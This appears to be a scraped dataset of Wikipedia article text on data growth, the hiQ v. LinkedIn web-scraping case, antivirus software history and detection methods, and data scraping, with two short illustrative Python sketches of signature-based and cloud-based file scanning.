the growth rate of newly stored information (uncompressed) was more than 30% per year. In a more limited study, the International Data Corporation estimated that the total amount of digital data in 2007 was 281 exabytes, and that the total amount of digital data produced exceeded the global storage capacity for the first time. 6 A 2011 Science Magazine article estimated that the year 2002 was the beginning of the digital age for information storage: an age in which more information is stored on digital storage devices than on analog storage devices. 7 In 1986, approximately 1% of the world's capacity to store information was in digital format; this grew to 3% by 1993, to 25% by 2000, and to 97% by 2007. These figures correspond to less than three compressed exabytes in 1986, and 295 compressed exabytes in 2007. 7 The quantity of digital storage doubled roughly every three years. 
8 It is estimated that around 120 zettabytes of data will be generated in 2023 update , an increase of 60x from 2010, and that it will increase to 181 zettabytes generated in 2025. 9 |
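As a quick arithmetic check of the growth figures quoted in the entry above (roughly 120 zettabytes generated in 2023, described as about 60x the 2010 figure), the snippet below computes the implied annual growth rate and doubling time. This is only a back-of-the-envelope calculation on the numbers as quoted, not a claim about the underlying studies.

# Growth-rate check on the figures quoted above.
import math

growth_factor = 60            # 2010 -> 2023, as quoted
years = 2023 - 2010
annual_growth = growth_factor ** (1 / years)            # about 1.37x per year
doubling_time = math.log(2) / math.log(annual_growth)   # about 2.2 years

print(f"Implied annual growth: {annual_growth:.2f}x per year")
print(f"Implied doubling time: {doubling_time:.1f} years")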
630 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/HiQ_Labs_v._LinkedIn | hiQ Labs, Inc. v. LinkedIn Corp., 938 F.3d 985 (9th Cir. 2019), was a United States Ninth Circuit case about web scraping. hiQ is a small data analytics company that used automated bots to scrape information from public LinkedIn profiles. LinkedIn used legal means to prevent this. hiQ Labs brought a case against LinkedIn in a district court, seeking an injunction against these means, which was granted. LinkedIn appealed. The 9th Circuit affirmed the district court's preliminary injunction, preventing LinkedIn from denying the plaintiff, hiQ Labs, from accessing LinkedIn's publicly available LinkedIn member profiles. However, after further appeal in another court, hiQ was found to be in breach of LinkedIn's terms, and there was a settlement. The 9th Circuit ruled that hiQ had the right to do web scraping. 1 2 3 However, the Supreme Court, based on its Van Buren v. United States decision, 4 vacated the decision and remanded the case for further review in June 2021. In a second ruling in April 2022 the Ninth Circuit affirmed its decision. 5 6 In November 2022 the U.S. District Court for the Northern District of California ruled that hiQ had breached LinkedIn's User Agreement and a settlement agreement was reached between the two parties. 7 LinkedIn served hiQ with a cease-and-desist, demanding that hiQ cease its activity of accessing and copying data from LinkedIn's server. hiQ filed suit against LinkedIn, seeking both injunctive relief under California law and a declaratory judgment to prevent LinkedIn from lawfully invoking the Computer Fraud and Abuse Act (CFAA), the Digital Millennium Copyright Act (DMCA), California Penal Code 502(c), or the common law of trespass against hiQ. The Ninth Circuit affirmed the district court's award of a preliminary injunction in hiQ's favor, finding that "hiQ established a likelihood of irreparable harm because the survival of its business was threatened. 8 The Ninth Circuit held that there was no abuse of discretion by the district court where the court had found that even if some LinkedIn users retained their privacy despite their public status, as they were not scraped, such privacy interests did not outweigh hiQ's interest in maintaining its business. In balancing the hardships, the Ninth Circuit determined it weighed in favor of hiQ. Further, the Ninth Circuit noted that hiQ posed serious concerns with regards to (1) the merits of its claim for tortious interference with contract, alleging that LinkedIn intentionally interfered with its contracts with third parties, and (2) the merits of LinkedIn’s legitimate business purpose defense. 8 Additionally, there was a serious contention as to whether the CFAA preempted hiQ's state law causes of action, specifically because the CFAA prohibits accessing a computer without authorization or exceeding one's authorization to obtain information from a protected computer. LinkedIn asserted that following the receipt of its cease-and-desist letter, hiQ's scraping and further use of its data without authorization fell within the meaning of "without authorization" within the CFAA. The Ninth Circuit affirmed the district court's finding that public interest favored the granting of a preliminary injunction. In his concurring opinion, Judge Wallace specified his concern about the appeal of a preliminary injunction initiated in order to obtain an appellate court's take on the merits. 
Ultimately, the Ninth Circuit's affirmation of the district court's grant of the preliminary injunction prohibited LinkedIn from denying hiQ access to publicly available data on public LinkedIn users' profiles. LinkedIn petitioned the Supreme Court to review the Ninth Circuit's decision. 9 In an order on June 14, 2021, 10 the Supreme Court vacated the Ninth Circuit's decision on the basis of their ruling on CFAA the week prior in Van Buren v. United States, which had ruled that the "exceeds authorized access" of CFAA only applies when an individual has valid access to a system but accesses parts of a system they are not intended to access. 4 The case was remanded to the Ninth Circuit for further review under Van Buren. 11 In a second ruling in April 2022 the Ninth Circuit affirmed its decision. 5 6 The Ninth Circuit's declaration that selectively banning potential competitors from accessing and using data that is publicly available can be considered unfair competition under California law may have large implication for antitrust law. citation needed Other countries with laws to prevent monopolistic practices or anti-trust laws may also see similar disputes and prospectively judgements hailing commercial use of publicly accessible information. While there is global precedence by virtue of large companies such as Thomson Reuters, Bloomberg or Google effectively using web-scraping or crawling to aggregate information from disparate sources across the web, fundamentally the judgement by Ninth Circuit fortifies the lack of enforceability of browse-wrap agreements over conduct of trade using publicly available information. |
631 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Antivirus_software | Antivirus software (abbreviated to AV software), also known as anti-malware, is a computer program used to prevent, detect, and remove malware. Antivirus software was originally developed to detect and remove computer viruses, hence the name. However, with the proliferation of other malware, antivirus software started to protect against other computer threats. Some products also include protection from malicious URLs, spam, and phishing. 1 The first known computer virus appeared in 1971 and was dubbed the "Creeper virus". 2 This computer virus infected Digital Equipment Corporation's (DEC) PDP 10 mainframe computers running the TENEX operating system. 3 4 The Creeper virus was eventually deleted by a program created by Ray Tomlinson and known as "The Reaper". 5 Some people consider "The Reaper" the first antivirus software ever written it may be the case, but it is important to note that the Reaper was actually a virus itself specifically designed to remove the Creeper virus. 5 6 The Creeper virus was followed by several other viruses. The first known that appeared "in the wild" was "Elk Cloner", in 1981, which infected Apple II computers. 7 8 9 In 1983, the term "computer virus" was coined by Fred Cohen in one of the first ever published academic papers on computer viruses. 10 Cohen used the term "computer virus" to describe programs that: "affect other computer programs by modifying them in such a way as to include a (possibly evolved) copy of itself. 11 (note that a more recent definition of computer virus has been given by the Hungarian security researcher P ter Sz r: "a code that recursively replicates a possibly evolved copy of itself"). 12 13 The first IBM PC compatible "in the wild" computer virus, and one of the first real widespread infections, was "Brain" in 1986. From then, the number of viruses has grown exponentially. 14 15 Most of the computer viruses written in the early and mid 1980s were limited to self-reproduction and had no specific damage routine built into the code. That changed when more and more programmers became acquainted with computer virus programming and created viruses that manipulated or even destroyed data on infected computers. 16 Before internet connectivity was widespread, computer viruses were typically spread by infected floppy disks. Antivirus software came into use, but was updated relatively infrequently. During this time, virus checkers essentially had to check executable files and the boot sectors of floppy disks and hard disks. However, as internet usage became common, viruses began to spread online. 17 There are competing claims for the innovator of the first antivirus product. Possibly, the first publicly documented removal of an "in the wild" computer virus (the "Vienna virus") was performed by Bernd Fix in 1987. 18 19 In 1987, Andreas L ning and Kai Figge, who founded G Data Software in 1985, released their first antivirus product for the Atari ST platform. 20 In 1987, the Ultimate Virus Killer (UVK) was also released. 21 This was the de facto industry standard virus killer for the Atari ST and Atari Falcon, the last version of which (version 9.0) was released in April 2004. citation needed In 1987, in the United States, John McAfee founded the McAfee company and, at the end of that year, he released the first version of VirusScan. 
22 Also in 1987 (in Czechoslovakia), Peter Pa ko, Rudolf Hrub , and Miroslav Trnka created the first version of NOD antivirus. 23 24 In 1987, Fred Cohen wrote that there is no algorithm that can perfectly detect all possible computer viruses. 25 Finally, at the end of 1987, the first two heuristic antivirus utilities were released: Flushot Plus by Ross Greenberg 26 27 28 and Anti4us by Erwin Lanting. 29 In his O'Reilly book, Malicious Mobile Code: Virus Protection for Windows, Roger Grimes described Flushot Plus as "the first holistic program to fight malicious mobile code (MMC). 30 However, the kind of heuristic used by early AV engines was totally different from those used today. The first product with a heuristic engine resembling modern ones was F-PROT in 1991. 31 Early heuristic engines were based on dividing the binary into different sections: data section, code section (in a legitimate binary, it usually starts always from the same location). Indeed, the initial viruses re-organized the layout of the sections, or overrode the initial portion of a section in order to jump to the very end of the file where malicious code was located—only going back to resume execution of the original code. This was a very specific pattern, not used at the time by any legitimate software, which represented an elegant heuristic to catch suspicious code. Other kinds of more advanced heuristics were later added, such as suspicious section names, incorrect header size, regular expressions, and partial pattern in-memory matching. In 1988, the growth of antivirus companies continued. In Germany, Tjark Auerbach founded Avira (H BEDV at the time) and released the first version of AntiVir (named "Luke Filewalker" at the time). In Bulgaria, Vesselin Bontchev released his first freeware antivirus program (he later joined FRISK Software). Also Frans Veldman released the first version of ThunderByte Antivirus, also known as TBAV (he sold his company to Norman Safeground in 1998). In Czechoslovakia, Pavel Baudi and Eduard Ku era founded Avast Software (at the time ALWIL Software) and released their first version of avast antivirus. In June 1988, in South Korea, Ahn Cheol-Soo released its first antivirus software, called V1 (he founded AhnLab later in 1995). Finally, in autumn 1988, in the United Kingdom, Alan Solomon founded S S International and created his Dr. Solomon's Anti-Virus Toolkit (although he launched it commercially only in 1991 in 1998 Solomon's company was acquired by McAfee). In November 1988 a professor at the Panamerican University in Mexico City named Alejandro E. Carriles copyrighted the first antivirus software in Mexico under the name "Byte Matabichos" (Byte Bugkiller) to help solve the rampant virus infestation among students. 32 Also in 1988, a mailing list named VIRUS-L 33 was started on the BITNET EARN network where new viruses and the possibilities of detecting and eliminating viruses were discussed. Some members of this mailing list were: Alan Solomon, Eugene Kaspersky (Kaspersky Lab), Fri rik Sk lason (FRISK Software), John McAfee (McAfee), Luis Corrons (Panda Security), Mikko Hypp nen (F-Secure), P ter Sz r, Tjark Auerbach (Avira) and Vesselin Bontchev (FRISK Software). 33 In 1989, in Iceland, Fri rik Sk lason created the first version of F-PROT Anti-Virus (he founded FRISK Software only in 1993). Meanwhile, in the United States, Symantec (founded by Gary Hendrix in 1982) launched its first Symantec antivirus for Macintosh (SAM). 
34 35 SAM 2.0, released March 1990, incorporated technology allowing users to easily update SAM to intercept and eliminate new viruses, including many that didn't exist at the time of the program's release. 36 In the end of the 1980s, in United Kingdom, Jan Hruska and Peter Lammer founded the security firm Sophos and began producing their first antivirus and encryption products. In the same period, in Hungary, also VirusBuster was founded (which has recently being incorporated by Sophos). In 1990, in Spain, Mikel Urizarbarrena founded Panda Security (Panda Software at the time). 37 In Hungary, the security researcher P ter Sz r released the first version of Pasteur antivirus. In Italy, Gianfranco Tonello created the first version of VirIT eXplorer antivirus, then founded TG Soft one year later. 38 In 1990, the Computer Antivirus Research Organization (CARO) was founded. In 1991, CARO released the "Virus Naming Scheme", originally written by Fri rik Sk lason and Vesselin Bontchev. 39 Although this naming scheme is now outdated, it remains the only existing standard that most computer security companies and researchers ever attempted to adopt. CARO members includes: Alan Solomon, Costin Raiu, Dmitry Gryaznov, Eugene Kaspersky, Fri rik Sk lason, Igor Muttik, Mikko Hypp nen, Morton Swimmer, Nick FitzGerald, Padgett Peterson, Peter Ferrie, Righard Zwienenberg and Vesselin Bontchev. 40 41 In 1991, in the United States, Symantec released the first version of Norton AntiVirus. In the same year, in the Czech Republic, Jan Gritzbach and Tom Hofer founded AVG Technologies (Grisoft at the time), although they released the first version of their Anti-Virus Guard (AVG) only in 1992. On the other hand, in Finland, F-Secure (founded in 1988 by Petri Allas and Risto Siilasmaa with the name of Data Fellows) released the first version of their antivirus product. F-Secure claims to be the first antivirus firm to establish a presence on the World Wide Web. 42 In 1991, the European Institute for Computer Antivirus Research (EICAR) was founded to further antivirus research and improve development of antivirus software. 43 44 In 1992, in Russia, Igor Danilov released the first version of SpiderWeb, which later became Dr.Web. 45 In 1994, AV-TEST reported that there were 28,613 unique malware samples (based on MD5) in their database. 46 Over time other companies were founded. In 1996, in Romania, Bitdefender was founded and released the first version of Anti-Virus eXpert (AVX). 47 In 1997, in Russia, Eugene Kaspersky and Natalya Kaspersky co-founded security firm Kaspersky Lab. 48 In 1996, there was also the first "in the wild" Linux virus, known as "Staog". 49 In 1999, AV-TEST reported that there were 98,428 unique malware samples (based on MD5) in their database. 46 In 2000, Rainer Link and Howard Fuhs started the first open source antivirus engine, called OpenAntivirus Project. 50 In 2001, Tomasz Kojm released the first version of ClamAV, the first ever open source antivirus engine to be commercialised. In 2007, ClamAV was bought by Sourcefire, 51 which in turn was acquired by Cisco Systems in 2013. 52 In 2002, in United Kingdom, Morten Lund and Theis S ndergaard co-founded the antivirus firm BullGuard. 53 In 2005, AV-TEST reported that there were 333,425 unique malware samples (based on MD5) in their database. 46 In 2007, AV-TEST reported a number of 5,490,960 new unique malware samples (based on MD5) only for that year. 
46 In 2012 and 2013, antivirus firms reported a new malware samples range from 300,000 to over 500,000 per day. 54 55 Over the years it has become necessary for antivirus software to use several different strategies (e.g. specific email and network protection or low level modules) and detection algorithms, as well as to check an increasing variety of files, rather than just executables, for several reasons: In 2005, F-Secure was the first security firm that developed an Anti-Rootkit technology, called BlackLight. Because most users are usually connected to the Internet on a continual basis, Jon Oberheide first proposed a Cloud-based antivirus design in 2008. 59 In February 2008 McAfee Labs added the industry-first cloud-based anti-malware functionality to VirusScan under the name Artemis. It was tested by AV-Comparatives in February 2008 60 and officially unveiled in August 2008 in McAfee VirusScan. 61 Cloud AV created problems for comparative testing of security software part of the AV definitions was out of testers control (on constantly updated AV company servers) thus making results non-repeatable. As a result, Anti-Malware Testing Standards Organisation (AMTSO) started working on method of testing cloud products which was adopted on May 7, 2009. 62 In 2011, AVG introduced a similar cloud service, called Protective Cloud Technology. 63 Following the 2013 release of the APT 1 report from Mandiant, the industry has seen a shift towards signature-less approaches to the problem capable of detecting and mitigating zero-day attacks. 64 Numerous approaches to address these new forms of threats have appeared, including behavioral detection, artificial intelligence, machine learning, and cloud-based file detection. According to Gartner, it is expected the rise of new entrants, such Carbon Black, Cylance and Crowdstrike will force end point protection incumbents into a new phase of innovation and acquisition. 65 One method from Bromium involves micro-virtualization to protect desktops from malicious code execution initiated by the end user. Another approach from SentinelOne and Carbon Black focuses on behavioral detection by building a full context around every process execution path in real time, 66 67 while Cylance leverages an artificial intelligence model based on machine learning. 68 Increasingly, these signature-less approaches have been defined by the media and analyst firms as "next-generation" antivirus 69 and are seeing rapid market adoption as certified antivirus replacement technologies by firms such as Coalfire and DirectDefense. 70 In response, traditional antivirus vendors such as Trend Micro, 71 Symantec and Sophos 72 have responded by incorporating "next-gen" offerings into their portfolios as analyst firms such as Forrester and Gartner have called traditional signature-based antivirus "ineffective" and "outdated". 73 As of Windows 8, Windows includes its own free antivirus protection under the Windows Defender brand. Despite bad detection scores in its early days, AV-Test now certifies Defender as one of its top products. 74 75 While it isn't publicly known how the inclusion of antivirus software in Windows affected antivirus sales, Google search traffic for antivirus has declined significantly since 2010. 76 In 2014 Microsoft bought McAfee. 77 Since 2016, there has been a notable amount of consolidation in the industry. Avast purchased AVG in 2016 for $1.3 billion. 78 Avira was acquired by Norton owner Gen Digital (then NortonLifeLock) in 2020 for $360 million. 
79 In 2021, the Avira division of Gen Digital acquired BullGuard. 80 The BullGuard brand was discontinued in 2022 and its customers were migrated to Norton. In 2022, Gen Digital acquired Avast, effectively consolidating four major antivirus brands under one owner. 81 In 1987, Frederick B. Cohen demonstrated that the algorithm which would be able to detect all possible viruses can't possibly exist (like the algorithm which determines whether or not the given program halts). 25 However, using different layers of defense, a good detection rate may be achieved. There are several methods which antivirus engines can use to identify malware: Traditional antivirus software relies heavily upon signatures to identify malware. 99 Substantially, when a malware sample arrives in the hands of an antivirus firm, it is analysed by malware researchers or by dynamic analysis systems. Then, once it is determined to be a malware, a proper signature of the file is extracted and added to the signatures database of the antivirus software. 100 Although the signature-based approach can effectively contain malware outbreaks, malware authors have tried to stay a step ahead of such software by writing "oligomorphic", "polymorphic" and, more recently, "metamorphic" viruses, which encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary. 101 Many viruses start as a single infection and through either mutation or refinements by other attackers, can grow into dozens of slightly different strains, called variants. Generic detection refers to the detection and removal of multiple threats using a single virus definition. 102 For example, the Vundo trojan has several family members, depending on the antivirus vendor's classification. Symantec classifies members of the Vundo family into two distinct categories, Trojan.Vundo and Trojan.Vundo.B. 103 104 While it may be advantageous to identify a specific virus, it can be quicker to detect a virus family through a generic signature or through an inexact match to an existing signature. Virus researchers find common areas that all viruses in a family share uniquely and can thus create a single generic signature. These signatures often contain non-contiguous code, using wildcard characters where differences lie. These wildcards allow the scanner to detect viruses even if they are padded with extra, meaningless code. 105 A detection that uses this method is said to be "heuristic detection". Anti-virus software can attempt to scan for rootkits. A rootkit is a type of malware designed to gain administrative-level control over a computer system without being detected. Rootkits can change how the operating system functions and in some cases can tamper with the anti-virus program and render it ineffective. Rootkits are also difficult to remove, in some cases requiring a complete re-installation of the operating system. 106 Real-time protection, on-access scanning, background guard, resident shield, autoprotect, and other synonyms refer to the automatic protection provided by most antivirus, anti-spyware, and other anti-malware programs. This monitors computer systems for suspicious activity such as computer viruses, spyware, adware, and other malicious objects. Real-time protection detects threats in opened files and scans apps in real-time as they are installed on the device. 107 When inserting a CD, opening an email, or browsing the web, or when a file already on the computer is opened or executed. 
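To make the signature-based and generic "wildcard" detection described above concrete, here is a minimal Python sketch. It is illustrative only, not a real engine: the MD5 hash, the byte pattern, the detection names, and the file path are all invented, and a production scanner would add heuristics, emulation, unpacking, and a far larger database.

import hashlib
import re

# Illustrative signature sets only; real antivirus databases hold millions of
# entries with much richer metadata. The hash and byte pattern below are invented.
EXACT_SIGNATURES = {
    "44d88612fea8a8f36de82e1278abb02f",  # placeholder MD5 digest, not a real detection
}
GENERIC_SIGNATURES = {
    # A "generic" family signature: a byte pattern with a wildcard (.{2} matches
    # any two bytes), compiled as a regular expression over the raw file contents.
    "Example.Family.A": re.compile(rb"\x4d\x5a.{2}\xde\xad\xbe\xef", re.DOTALL),
}

def md5_of_file(path):
    # Hash the file in chunks so large files never need to fit in memory.
    digest = hashlib.md5()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def scan_file(path):
    # Exact detection first: compare the whole-file hash against known-bad hashes.
    if md5_of_file(path) in EXACT_SIGNATURES:
        return "Known.Sample.ExactHash"
    # Generic detection: wildcard patterns can still match family variants that
    # have been padded with extra, meaningless code.
    with open(path, "rb") as handle:
        data = handle.read()
    for name, pattern in GENERIC_SIGNATURES.items():
        if pattern.search(data):
            return name
    return None  # no signature matched

# Hypothetical usage: scan_file("suspect.bin")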
108 Some commercial antivirus software end-user license agreements include a clause that the subscription will be automatically renewed, and the purchaser's credit card automatically billed, at the renewal time without explicit approval. For example, McAfee requires users to unsubscribe at least 60 days before the expiration of the present subscription 109 while Bitdefender sends notifications to unsubscribe 30 days before the renewal. 110 Norton AntiVirus also renews subscriptions automatically by default. 111 Some apparent antivirus programs are actually malware masquerading as legitimate software, such as WinFixer, MS Antivirus, and Mac Defender. 112 A "false positive" or "false alarm" is when antivirus software identifies a non-malicious file as malware. When this happens, it can cause serious problems. For example, if an antivirus program is configured to immediately delete or quarantine infected files, as is common on Microsoft Windows antivirus applications, a false positive in an essential file can render the Windows operating system or some applications unusable. 113 Recovering from such damage to critical software infrastructure incurs technical support costs and businesses can be forced to close whilst remedial action is undertaken. 114 115 Examples of serious false-positives: On the basis that Norton Symantec has done this for every one of the last three releases of Pegasus Mail, we can only condemn this product as too flawed to use, and recommend in the strongest terms that our users cease using it in favour of alternative, less buggy anti-virus packages. 117 Running (the real-time protection of) multiple antivirus programs concurrently can degrade performance and create conflicts. 126 However, using a concept called multiscanning, several companies (including G Data Software 127 and Microsoft 128 ) have created applications which can run multiple engines concurrently. It is sometimes necessary to temporarily disable virus protection when installing major updates such as Windows Service Packs or updating graphics card drivers. 129 Active antivirus protection may partially or completely prevent the installation of a major update. Anti-virus software can cause problems during the installation of an operating system upgrade, e.g. when upgrading to a newer version of Windows "in place"—without erasing the previous version of Windows. Microsoft recommends that anti-virus software be disabled to avoid conflicts with the upgrade installation process. 130 131 132 Active anti-virus software can also interfere with a firmware update process. 133 The functionality of a few computer programs can be hampered by active anti-virus software. For example, TrueCrypt, a disk encryption program, states on its troubleshooting page that anti-virus programs can conflict with TrueCrypt and cause it to malfunction or operate very slowly. 134 Anti-virus software can impair the performance and stability of games running in the Steam platform. 135 Support issues also exist around antivirus application interoperability with common solutions like SSL VPN remote access and network access control products. 136 These technology solutions often have policy assessment applications that require an up-to-date antivirus to be installed and running. If the antivirus application is not recognized by the policy assessment, whether because the antivirus application has been updated or because it is not part of the policy assessment library, the user will be unable to connect. 
Studies in December 2007 showed that the effectiveness of antivirus software had decreased in the previous year, particularly against unknown or zero day attacks. The computer magazine c't found that detection rates for these threats had dropped from 40 to 50% in 2006 to 20 30% in 2007. At that time, the only exception was the NOD32 antivirus, which managed a detection rate of 68%. 137 According to the ZeuS tracker website the average detection rate for all variants of the well-known ZeuS trojan is as low as 40%. 138 The problem is magnified by the changing intent of virus authors. Some years ago it was obvious when a virus infection was present. At the time, viruses were written by amateurs and exhibited destructive behavior or pop-ups. Modern viruses are often written by professionals, financed by criminal organizations. 139 In 2008, Eva Chen, CEO of Trend Micro, stated that the anti-virus industry has over-hyped how effective its products are—and so has been misleading customers—for years. 140 Independent testing on all the major virus scanners consistently shows that none provides 100% virus detection. The best ones provided as high as 99.9% detection for simulated real-world situations, while the lowest provided 91.1% in tests conducted in August 2013. Many virus scanners produce false positive results as well, identifying benign files as malware. 141 Although methods may differ, some notable independent quality testing agencies include AV-Comparatives, ICSA Labs, SE Labs, West Coast Labs, Virus Bulletin, AV-TEST and other members of the Anti-Malware Testing Standards Organization. 142 143 Anti-virus programs are not always effective against new viruses, even those that use non-signature-based methods that should detect new viruses. The reason for this is that the virus designers test their new viruses on the major anti-virus applications to make sure that they are not detected before releasing them into the wild. 144 Some new viruses, particularly ransomware, use polymorphic code to avoid detection by virus scanners. Jerome Segura, a security analyst with ParetoLogic, explained: 145 It's something that they miss a lot of the time because this type of ransomware virus comes from sites that use a polymorphism, which means they basically randomize the file they send you and it gets by well-known antivirus products very easily. I've seen people firsthand getting infected, having all the pop-ups and yet they have antivirus software running and it's not detecting anything. It actually can be pretty hard to get rid of, as well, and you're never really sure if it's really gone. When we see something like that usually we advise to reinstall the operating system or reinstall backups. 145 A proof of concept virus has used the Graphics Processing Unit (GPU) to avoid detection from anti-virus software. The potential success of this involves bypassing the CPU in order to make it much harder for security researchers to analyse the inner workings of such malware. 146 Detecting rootkits is a major challenge for anti-virus programs. Rootkits have full administrative access to the computer and are invisible to users and hidden from the list of running processes in the task manager. Rootkits can modify the inner workings of the operating system and tamper with antivirus programs. 147 If a file has been infected by a computer virus, anti-virus software will attempt to remove the virus code from the file during disinfection, but it is not always able to restore the file to its undamaged state. 
148 149 In such circumstances, damaged files can only be restored from existing backups or shadow copies (this is also true for ransomware 150 ); installed software that is damaged requires re-installation 151 (however, see System File Checker). Any writeable firmware in the computer can be infected by malicious code. 152 This is a major concern, as an infected BIOS could require the actual BIOS chip to be replaced to ensure the malicious code is completely removed. 153 Anti-virus software is not effective at protecting firmware and the motherboard BIOS from infection. 154 In 2014, security researchers discovered that USB devices contain writeable firmware which can be modified with malicious code (dubbed "BadUSB"), which anti-virus software cannot detect or prevent. The malicious code can run undetected on the computer and could even infect the operating system prior to it booting up. 155 156 Antivirus software has some drawbacks, first of which that it can impact a computer's performance. 157 Furthermore, inexperienced users can be lulled into a false sense of security when using the computer, considering their computers to be invulnerable, and may have problems understanding the prompts and decisions that antivirus software presents them with. An incorrect decision may lead to a security breach. If the antivirus software employs heuristic detection, it must be fine-tuned to minimize misidentifying harmless software as malicious (false positive). 158 Antivirus software itself usually runs at the highly trusted kernel level of the operating system to allow it access to all the potential malicious process and files, creating a potential avenue of attack. 159 The US National Security Agency (NSA) and the UK Government Communications Headquarters (GCHQ) intelligence agencies, respectively, have been exploiting anti-virus software to spy on users. 160 Anti-virus software has highly privileged and trusted access to the underlying operating system, which makes it a much more appealing target for remote attacks. 161 Additionally anti-virus software is "years behind security-conscious client-side applications like browsers or document readers. It means that Acrobat Reader, Microsoft Word or Google Chrome are harder to exploit than 90 percent of the anti-virus products out there", according to Joxean Koret, a researcher with Coseinc, a Singapore-based information security consultancy. 161 Antivirus software running on individual computers is the most common method employed of guarding against malware, but it is not the only solution. Other solutions can also be employed by users, including Unified Threat Management (UTM), hardware and network firewalls, Cloud-based antivirus and online scanners. Network firewalls prevent unknown programs and processes from accessing the system. However, they are not antivirus systems and make no attempt to identify or remove anything. They may protect against infection from outside the protected computer or network, and limit the activity of any malicious software which is present by blocking incoming or outgoing requests on certain TCP IP ports. A firewall is designed to deal with broader system threats that come from network connections into the system and is not an alternative to a virus protection system. Cloud antivirus is a technology that uses lightweight agent software on the protected computer, while offloading the majority of data analysis to the provider's infrastructure. 
162 One approach to implementing cloud antivirus involves scanning suspicious files using multiple antivirus engines. This approach was proposed by an early implementation of the cloud antivirus concept called CloudAV. CloudAV was designed to send programs or documents to a network cloud where multiple antivirus and behavioral detection programs are used simultaneously in order to improve detection rates. Parallel scanning of files using potentially incompatible antivirus scanners is achieved by spawning a virtual machine per detection engine and therefore eliminating any possible issues. CloudAV can also perform "retrospective detection", whereby the cloud detection engine rescans all files in its file access history when a new threat is identified thus improving new threat detection speed. Finally, CloudAV is a solution for effective virus scanning on devices that lack the computing power to perform the scans themselves. 163 Some examples of cloud anti-virus products are Panda Cloud Antivirus and Immunet. Comodo Group has also produced cloud-based anti-virus. 164 165 Some antivirus vendors maintain websites with free online scanning capability of the entire computer, critical areas only, local disks, folders or files. Periodic online scanning is a good idea for those that run antivirus applications on their computers because those applications are frequently slow to catch threats. One of the first things that malicious software does in an attack is disable any existing antivirus software and sometimes the only way to know of an attack is by turning to an online resource that is not installed on the infected computer. 166 Virus removal tools are available to help remove stubborn infections or a certain type of infection. Examples include Windows Malicious Software Removal Tool, 167 Sophos Scan Clean, 168 and Kaspersky Virus Removal Tool. 169 It is also worth noting that sometimes antivirus software can produce a false-positive result, indicating an infection where there is none. 170 A rescue disk that is bootable, such as a CD or USB storage device, can be used to run antivirus software outside of the installed operating system in order to remove infections while they are dormant. A bootable rescue disk can be useful when, for example, the installed operating system is no longer bootable or has malware that is resisting all attempts to be removed by the installed antivirus software. Examples of software that can be used on a bootable rescue disk include the Trend Micro Rescue Disk, 171 Kaspersky Rescue Disk, 172 and Comodo Rescue Disk. 173 Most of the rescue disk software can also be installed onto a USB storage device that is bootable on newer computers. According to an FBI survey, major businesses lose $12 million annually dealing with virus incidents. 174 A survey by Symantec in 2009 found that a third of small to medium-sized business did not use antivirus protection at that time, whereas more than 80% of home users had some kind of antivirus installed. 175 According to a sociological survey conducted by G Data Software in 2010 49% of women did not use any antivirus program at all. 176 |
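The client side of the cloud antivirus design described above can be sketched as follows, assuming a purely hypothetical lookup endpoint and JSON response format; it does not reproduce the actual protocol of CloudAV, Panda Cloud Antivirus, Immunet, or Comodo. Only a file hash is sent, which is what keeps the local agent lightweight.

import hashlib
import requests

# Hypothetical cloud lookup endpoint and response format: not a real service.
CLOUD_LOOKUP_URL = "https://av-cloud.example.com/lookup"

def file_sha256(path):
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(8192), b""):
            digest.update(chunk)
    return digest.hexdigest()

def cloud_scan(path, timeout=10):
    # Send only the file hash; the heavy analysis (multiple engines,
    # retrospective rescans) happens on the provider's infrastructure.
    try:
        response = requests.post(
            CLOUD_LOOKUP_URL, json={"sha256": file_sha256(path)}, timeout=timeout
        )
        response.raise_for_status()
        # Assumed response shape: {"verdict": "clean" | "malicious" | "unknown"}
        return response.json().get("verdict", "unknown")
    except requests.RequestException:
        # If the cloud is unreachable, a real agent would fall back to local
        # signatures or queue the file for a later rescan.
        return "unknown"

# Hypothetical usage: cloud_scan("suspect.bin")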
632 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#Technical_variants | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. 
